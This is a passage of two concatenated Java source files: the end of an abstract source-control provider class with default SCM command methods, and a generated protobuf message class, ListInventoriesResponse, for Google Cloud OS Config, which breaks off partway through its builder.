parameters.setScmVersion(CommandParameter.START_SCM_VERSION, startVersion); parameters.setScmVersion(CommandParameter.END_SCM_VERSION, endVersion); return diff(repository.getProviderRepository(), fileSet, parameters); } protected DiffScmResult diff(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { throw new NoSuchCommandScmException("diff"); } /** * {@inheritDoc} */ @Override public EditScmResult edit(ScmRepository repository, ScmFileSet fileSet) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); return edit(repository.getProviderRepository(), fileSet, parameters); } protected EditScmResult edit(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { if (logger.isWarnEnabled()) { logger.warn("Provider " + this.getScmType() + " does not support edit operation."); } return new EditScmResult("", null, null, true); } /** * {@inheritDoc} * * @deprecated */ @Deprecated @Override public ExportScmResult export(ScmRepository repository, ScmFileSet fileSet, String tag) throws ScmException { return export(repository, fileSet, tag, null); } /** * {@inheritDoc} * * @deprecated */ @Deprecated @Override public ExportScmResult export(ScmRepository repository, ScmFileSet fileSet, String tag, String outputDirectory) throws ScmException { ScmVersion scmVersion = null; if (tag != null && !tag.isEmpty()) { scmVersion = new ScmRevision(tag); } return export(repository, fileSet, scmVersion, outputDirectory); } /** * {@inheritDoc} */ @Override public ExportScmResult export(ScmRepository repository, ScmFileSet fileSet) throws ScmException { return export(repository, fileSet, (ScmVersion) null, null); } /** * {@inheritDoc} */ @Override public ExportScmResult export(ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion) throws ScmException { return export(repository, fileSet, scmVersion, null); } /** * {@inheritDoc} */ @Override public ExportScmResult export( ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, String outputDirectory) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); parameters.setScmVersion(CommandParameter.SCM_VERSION, scmVersion); parameters.setString(CommandParameter.OUTPUT_DIRECTORY, outputDirectory); return export(repository.getProviderRepository(), fileSet, parameters); } protected ExportScmResult export(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { throw new NoSuchCommandScmException("export"); } /** * {@inheritDoc} */ @Override public ListScmResult list(ScmRepository repository, ScmFileSet fileSet, boolean recursive, String tag) throws ScmException { ScmVersion scmVersion = null; if (tag != null && !tag.isEmpty()) { scmVersion = new ScmRevision(tag); } return list(repository, fileSet, recursive, scmVersion); } /** * {@inheritDoc} */ @Override public ListScmResult list(ScmRepository repository, ScmFileSet fileSet, boolean recursive, ScmVersion scmVersion) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); parameters.setString(CommandParameter.RECURSIVE, Boolean.toString(recursive)); if (scmVersion != null) { parameters.setScmVersion(CommandParameter.SCM_VERSION, scmVersion); } return list(repository.getProviderRepository(), fileSet, parameters); } /** * List each element (files and directories) of <B>fileSet</B> as they exist in the repository. * * @param repository the source control system * @param fileSet the files to list * @param parameters TODO * @return the list of files in the repository * @throws NoSuchCommandScmException unless overriden by subclass * @throws ScmException if any */ protected ListScmResult list(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { throw new NoSuchCommandScmException("list"); } /** * {@inheritDoc} */ @Override public MkdirScmResult mkdir(ScmRepository repository, ScmFileSet fileSet, String message, boolean createInLocal) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); if (message == null) { message = ""; if (!createInLocal) { logger.warn("Commit message is empty!"); } } parameters.setString(CommandParameter.MESSAGE, message); parameters.setString(CommandParameter.SCM_MKDIR_CREATE_IN_LOCAL, Boolean.toString(createInLocal)); return mkdir(repository.getProviderRepository(), fileSet, parameters); } /** * Create directory/directories in the repository. * * @param repository TODO * @param fileSet TODO * @param parameters TODO * @return TODO * @throws ScmException if any */ protected MkdirScmResult mkdir(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { throw new NoSuchCommandScmException("mkdir"); } private void login(ScmRepository repository, ScmFileSet fileSet) throws ScmException { LoginScmResult result = login(repository.getProviderRepository(), fileSet, new CommandParameters()); if (!result.isSuccess()) { throw new ScmException("Can't login.\n" + result.getCommandOutput()); } } protected LoginScmResult login(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { return new LoginScmResult(null, null, null, true); } /** * {@inheritDoc} */ @Override public RemoveScmResult remove(ScmRepository repository, ScmFileSet fileSet, String message) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); parameters.setString(CommandParameter.MESSAGE, message == null ? "" : message); return remove(repository.getProviderRepository(), fileSet, parameters); } protected RemoveScmResult remove(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { throw new NoSuchCommandScmException("remove"); } /** * {@inheritDoc} */ @Override public StatusScmResult status(ScmRepository repository, ScmFileSet fileSet) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); return status(repository.getProviderRepository(), fileSet, parameters); } protected StatusScmResult status(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { throw new NoSuchCommandScmException("status"); } /** * {@inheritDoc} */ @Override public TagScmResult tag(ScmRepository repository, ScmFileSet fileSet, String tagName) throws ScmException { return tag(repository, fileSet, tagName, new ScmTagParameters()); } /** * {@inheritDoc} */ @Override public TagScmResult tag(ScmRepository repository, ScmFileSet fileSet, String tagName, String message) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); parameters.setString(CommandParameter.TAG_NAME, tagName); if (message != null && !message.isEmpty()) { parameters.setString(CommandParameter.MESSAGE, message); } ScmTagParameters scmTagParameters = new ScmTagParameters(message); parameters.setScmTagParameters(CommandParameter.SCM_TAG_PARAMETERS, scmTagParameters); return tag(repository.getProviderRepository(), fileSet, parameters); } /** * {@inheritDoc} */ @Override public TagScmResult tag( ScmRepository repository, ScmFileSet fileSet, String tagName, ScmTagParameters scmTagParameters) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); parameters.setString(CommandParameter.TAG_NAME, tagName); parameters.setScmTagParameters(CommandParameter.SCM_TAG_PARAMETERS, scmTagParameters); return tag(repository.getProviderRepository(), fileSet, parameters); } protected TagScmResult tag(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { throw new NoSuchCommandScmException("tag"); } /** * {@inheritDoc} */ @Override public UnEditScmResult unedit(ScmRepository repository, ScmFileSet fileSet) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); return unedit(repository.getProviderRepository(), fileSet, parameters); } protected UnEditScmResult unedit(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { if (logger.isWarnEnabled()) { logger.warn("Provider " + this.getScmType() + " does not support unedit operation."); } return new UnEditScmResult("", null, null, true); } /** * {@inheritDoc} */ @Override public UntagScmResult untag(ScmRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { logger.warn("Provider " + this.getScmType() + " does not support untag operation."); return new UntagScmResult("", null, null, true); } /** * {@inheritDoc} * * @deprecated */ @Deprecated @Override public UpdateScmResult update(ScmRepository repository, ScmFileSet fileSet, String tag) throws ScmException { return update(repository, fileSet, tag, true); } /** * {@inheritDoc} * * @deprecated */ @Deprecated @Override public UpdateScmResult update(ScmRepository repository, ScmFileSet fileSet, String tag, boolean runChangelog) throws ScmException { return update(repository, fileSet, tag, "", runChangelog); } /** * {@inheritDoc} */ @Override public UpdateScmResult update(ScmRepository repository, ScmFileSet fileSet) throws ScmException { return update(repository, fileSet, (ScmVersion) null, true); } /** * {@inheritDoc} */ @Override public UpdateScmResult update(ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion) throws ScmException { return update(repository, fileSet, scmVersion, true); } /** * {@inheritDoc} */ @Override public UpdateScmResult update(ScmRepository repository, ScmFileSet fileSet, boolean runChangelog) throws ScmException { return update(repository, fileSet, (ScmVersion) null, "", runChangelog); } /** * {@inheritDoc} */ @Override public UpdateScmResult update( ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, boolean runChangelog) throws ScmException { return update(repository, fileSet, scmVersion, "", runChangelog); } /** * {@inheritDoc} * * @deprecated */ @Override public UpdateScmResult update(ScmRepository repository, ScmFileSet fileSet, String tag, String datePattern) throws ScmException { return update(repository, fileSet, tag, datePattern, true); } /** * {@inheritDoc} */ @Override public UpdateScmResult update( ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, String datePattern) throws ScmException { return update(repository, fileSet, scmVersion, datePattern, true); } /** * @deprecated */ private UpdateScmResult update( ScmRepository repository, ScmFileSet fileSet, String tag, String datePattern, boolean runChangelog) throws ScmException { ScmBranch scmBranch = null; if (tag != null && !tag.isEmpty()) { scmBranch = new ScmBranch(tag); } return update(repository, fileSet, scmBranch, datePattern, runChangelog); } private UpdateScmResult update( ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, String datePattern, boolean runChangelog) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); parameters.setScmVersion(CommandParameter.SCM_VERSION, scmVersion); parameters.setString(CommandParameter.CHANGELOG_DATE_PATTERN, datePattern); parameters.setString(CommandParameter.RUN_CHANGELOG_WITH_UPDATE, String.valueOf(runChangelog)); return update(repository.getProviderRepository(), fileSet, parameters); } /** * {@inheritDoc} * * @deprecated */ @Deprecated @Override public UpdateScmResult update(ScmRepository repository, ScmFileSet fileSet, String tag, Date lastUpdate) throws ScmException { return update(repository, fileSet, tag, lastUpdate, null); } /** * {@inheritDoc} */ @Override public UpdateScmResult update(ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, Date lastUpdate) throws ScmException { return update(repository, fileSet, scmVersion, lastUpdate, null); } /** * {@inheritDoc} * * @deprecated */ @Deprecated @Override public UpdateScmResult update( ScmRepository repository, ScmFileSet fileSet, String tag, Date lastUpdate, String datePattern) throws ScmException { ScmBranch scmBranch = null; if (tag != null && !tag.isEmpty()) { scmBranch = new ScmBranch(tag); } return update(repository, fileSet, scmBranch, lastUpdate, datePattern); } /** * {@inheritDoc} */ @Override public UpdateScmResult update( ScmRepository repository, ScmFileSet fileSet, ScmVersion scmVersion, Date lastUpdate, String datePattern) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); parameters.setScmVersion(CommandParameter.SCM_VERSION, scmVersion); if (lastUpdate != null) { parameters.setDate(CommandParameter.START_DATE, lastUpdate); } parameters.setString(CommandParameter.CHANGELOG_DATE_PATTERN, datePattern); parameters.setString(CommandParameter.RUN_CHANGELOG_WITH_UPDATE, "true"); return update(repository.getProviderRepository(), fileSet, parameters); } protected UpdateScmResult update(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { throw new NoSuchCommandScmException("update"); } /** * {@inheritDoc} */ @Override public BlameScmResult blame(ScmRepository repository, ScmFileSet fileSet, String filename) throws ScmException { login(repository, fileSet); CommandParameters parameters = new CommandParameters(); parameters.setString(CommandParameter.FILE, filename); return blame(repository.getProviderRepository(), fileSet, parameters); } protected BlameScmResult blame(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { throw new NoSuchCommandScmException("blame"); } @Override public BlameScmResult blame(BlameScmRequest blameScmRequest) throws ScmException { return blame( blameScmRequest.getScmRepository().getProviderRepository(), blameScmRequest.getScmFileSet(), blameScmRequest.getCommandParameters()); } @Override public InfoScmResult info(ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { return null; } @Override public RemoteInfoScmResult remoteInfo( ScmProviderRepository repository, ScmFileSet fileSet, CommandParameters parameters) throws ScmException { return null; } /** * {@inheritDoc} */ @Override public ScmProviderRepository makeProviderScmRepository(File path) throws ScmRepositoryException, UnknownRepositoryStructure { throw new UnknownRepositoryStructure(); } }
googleapis/google-cloud-java
35,776
java-os-config/proto-google-cloud-os-config-v1/src/main/java/com/google/cloud/osconfig/v1/ListInventoriesResponse.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/osconfig/v1/inventory.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.osconfig.v1; /** * * * <pre> * A response message for listing inventory data for all VMs in a specified * location. * </pre> * * Protobuf type {@code google.cloud.osconfig.v1.ListInventoriesResponse} */ public final class ListInventoriesResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.osconfig.v1.ListInventoriesResponse) ListInventoriesResponseOrBuilder { private static final long serialVersionUID = 0L; // Use ListInventoriesResponse.newBuilder() to construct. private ListInventoriesResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ListInventoriesResponse() { inventories_ = java.util.Collections.emptyList(); nextPageToken_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ListInventoriesResponse(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.osconfig.v1.Inventories .internal_static_google_cloud_osconfig_v1_ListInventoriesResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.osconfig.v1.Inventories .internal_static_google_cloud_osconfig_v1_ListInventoriesResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.osconfig.v1.ListInventoriesResponse.class, com.google.cloud.osconfig.v1.ListInventoriesResponse.Builder.class); } public static final int INVENTORIES_FIELD_NUMBER = 1; @SuppressWarnings("serial") private java.util.List<com.google.cloud.osconfig.v1.Inventory> inventories_; /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ @java.lang.Override public java.util.List<com.google.cloud.osconfig.v1.Inventory> getInventoriesList() { return inventories_; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ @java.lang.Override public java.util.List<? extends com.google.cloud.osconfig.v1.InventoryOrBuilder> getInventoriesOrBuilderList() { return inventories_; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ @java.lang.Override public int getInventoriesCount() { return inventories_.size(); } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ @java.lang.Override public com.google.cloud.osconfig.v1.Inventory getInventories(int index) { return inventories_.get(index); } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ @java.lang.Override public com.google.cloud.osconfig.v1.InventoryOrBuilder getInventoriesOrBuilder(int index) { return inventories_.get(index); } public static final int NEXT_PAGE_TOKEN_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object nextPageToken_ = ""; /** * * * <pre> * The pagination token to retrieve the next page of inventory objects. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ @java.lang.Override public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } } /** * * * <pre> * The pagination token to retrieve the next page of inventory objects. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. */ @java.lang.Override public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < inventories_.size(); i++) { output.writeMessage(1, inventories_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, nextPageToken_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < inventories_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, inventories_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, nextPageToken_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.osconfig.v1.ListInventoriesResponse)) { return super.equals(obj); } com.google.cloud.osconfig.v1.ListInventoriesResponse other = (com.google.cloud.osconfig.v1.ListInventoriesResponse) obj; if (!getInventoriesList().equals(other.getInventoriesList())) return false; if (!getNextPageToken().equals(other.getNextPageToken())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getInventoriesCount() > 0) { hash = (37 * hash) + INVENTORIES_FIELD_NUMBER; hash = (53 * hash) + getInventoriesList().hashCode(); } hash = (37 * hash) + NEXT_PAGE_TOKEN_FIELD_NUMBER; hash = (53 * hash) + getNextPageToken().hashCode(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.cloud.osconfig.v1.ListInventoriesResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * A response message for listing inventory data for all VMs in a specified * location. * </pre> * * Protobuf type {@code google.cloud.osconfig.v1.ListInventoriesResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.osconfig.v1.ListInventoriesResponse) com.google.cloud.osconfig.v1.ListInventoriesResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.osconfig.v1.Inventories .internal_static_google_cloud_osconfig_v1_ListInventoriesResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.osconfig.v1.Inventories .internal_static_google_cloud_osconfig_v1_ListInventoriesResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.osconfig.v1.ListInventoriesResponse.class, com.google.cloud.osconfig.v1.ListInventoriesResponse.Builder.class); } // Construct using com.google.cloud.osconfig.v1.ListInventoriesResponse.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (inventoriesBuilder_ == null) { inventories_ = java.util.Collections.emptyList(); } else { inventories_ = null; inventoriesBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); nextPageToken_ = ""; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.osconfig.v1.Inventories .internal_static_google_cloud_osconfig_v1_ListInventoriesResponse_descriptor; } @java.lang.Override public com.google.cloud.osconfig.v1.ListInventoriesResponse getDefaultInstanceForType() { return com.google.cloud.osconfig.v1.ListInventoriesResponse.getDefaultInstance(); } @java.lang.Override public com.google.cloud.osconfig.v1.ListInventoriesResponse build() { com.google.cloud.osconfig.v1.ListInventoriesResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.osconfig.v1.ListInventoriesResponse buildPartial() { com.google.cloud.osconfig.v1.ListInventoriesResponse result = new com.google.cloud.osconfig.v1.ListInventoriesResponse(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.osconfig.v1.ListInventoriesResponse result) { if (inventoriesBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { inventories_ = java.util.Collections.unmodifiableList(inventories_); bitField0_ = (bitField0_ & ~0x00000001); } result.inventories_ = inventories_; } else { result.inventories_ = inventoriesBuilder_.build(); } } private void buildPartial0(com.google.cloud.osconfig.v1.ListInventoriesResponse result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000002) != 0)) { result.nextPageToken_ = nextPageToken_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.osconfig.v1.ListInventoriesResponse) { return mergeFrom((com.google.cloud.osconfig.v1.ListInventoriesResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.osconfig.v1.ListInventoriesResponse other) { if (other == com.google.cloud.osconfig.v1.ListInventoriesResponse.getDefaultInstance()) return this; if (inventoriesBuilder_ == null) { if (!other.inventories_.isEmpty()) { if (inventories_.isEmpty()) { inventories_ = other.inventories_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensureInventoriesIsMutable(); inventories_.addAll(other.inventories_); } onChanged(); } } else { if (!other.inventories_.isEmpty()) { if (inventoriesBuilder_.isEmpty()) { inventoriesBuilder_.dispose(); inventoriesBuilder_ = null; inventories_ = other.inventories_; bitField0_ = (bitField0_ & ~0x00000001); inventoriesBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? getInventoriesFieldBuilder() : null; } else { inventoriesBuilder_.addAllMessages(other.inventories_); } } } if (!other.getNextPageToken().isEmpty()) { nextPageToken_ = other.nextPageToken_; bitField0_ |= 0x00000002; onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.cloud.osconfig.v1.Inventory m = input.readMessage( com.google.cloud.osconfig.v1.Inventory.parser(), extensionRegistry); if (inventoriesBuilder_ == null) { ensureInventoriesIsMutable(); inventories_.add(m); } else { inventoriesBuilder_.addMessage(m); } break; } // case 10 case 18: { nextPageToken_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloud.osconfig.v1.Inventory> inventories_ = java.util.Collections.emptyList(); private void ensureInventoriesIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { inventories_ = new java.util.ArrayList<com.google.cloud.osconfig.v1.Inventory>(inventories_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.osconfig.v1.Inventory, com.google.cloud.osconfig.v1.Inventory.Builder, com.google.cloud.osconfig.v1.InventoryOrBuilder> inventoriesBuilder_; /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public java.util.List<com.google.cloud.osconfig.v1.Inventory> getInventoriesList() { if (inventoriesBuilder_ == null) { return java.util.Collections.unmodifiableList(inventories_); } else { return inventoriesBuilder_.getMessageList(); } } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public int getInventoriesCount() { if (inventoriesBuilder_ == null) { return inventories_.size(); } else { return inventoriesBuilder_.getCount(); } } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public com.google.cloud.osconfig.v1.Inventory getInventories(int index) { if (inventoriesBuilder_ == null) { return inventories_.get(index); } else { return inventoriesBuilder_.getMessage(index); } } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder setInventories(int index, com.google.cloud.osconfig.v1.Inventory value) { if (inventoriesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureInventoriesIsMutable(); inventories_.set(index, value); onChanged(); } else { inventoriesBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder setInventories( int index, com.google.cloud.osconfig.v1.Inventory.Builder builderForValue) { if (inventoriesBuilder_ == null) { ensureInventoriesIsMutable(); inventories_.set(index, builderForValue.build()); onChanged(); } else { inventoriesBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder addInventories(com.google.cloud.osconfig.v1.Inventory value) { if (inventoriesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureInventoriesIsMutable(); inventories_.add(value); onChanged(); } else { inventoriesBuilder_.addMessage(value); } return this; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder addInventories(int index, com.google.cloud.osconfig.v1.Inventory value) { if (inventoriesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureInventoriesIsMutable(); inventories_.add(index, value); onChanged(); } else { inventoriesBuilder_.addMessage(index, value); } return this; } 